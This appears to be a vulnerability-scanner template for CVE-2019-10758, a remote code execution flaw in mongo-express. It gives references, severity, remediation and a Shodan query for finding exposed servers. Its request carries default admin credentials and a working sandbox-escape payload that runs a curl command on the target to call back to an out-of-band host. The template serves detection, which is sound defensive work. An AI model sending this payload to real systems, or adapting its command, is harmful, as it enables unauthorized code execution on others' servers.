id: CVE-2019-10758 info: name: mongo-express Remote Code Execution author: princechaddha severity: critical description: mongo-express before 0.54.0 is vulnerable to remote code execution via endpoints that uses the `toBSON` method and misuse the `vm` dependency to perform `exec` commands in a non-safe environment. reference: - https://github.com/vulhub/vulhub/tree/master/mongo-express/CVE-2019-10758 - https://nvd.nist.gov/vuln/detail/CVE-2019-10758 - https://snyk.io/vuln/SNYK-JS-MONGOEXPRESS-473215 remediation: Upgrade mongo-express to version 0.54.0 or higher. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H cvss-score: 9.9 cve-id: CVE-2019-10758 metadata: shodan-query: http.title:"Mongo Express" tags: cve,cve2019,mongo,mongo-express,kev requests: - raw: - | POST /checkValid HTTP/1.1 Host: {{Hostname}} Authorization: Basic YWRtaW46cGFzcw== Content-Type: application/x-www-form-urlencoded document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl http://{{interactsh-url}}") matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" # Enhanced by mp on 2022/03/29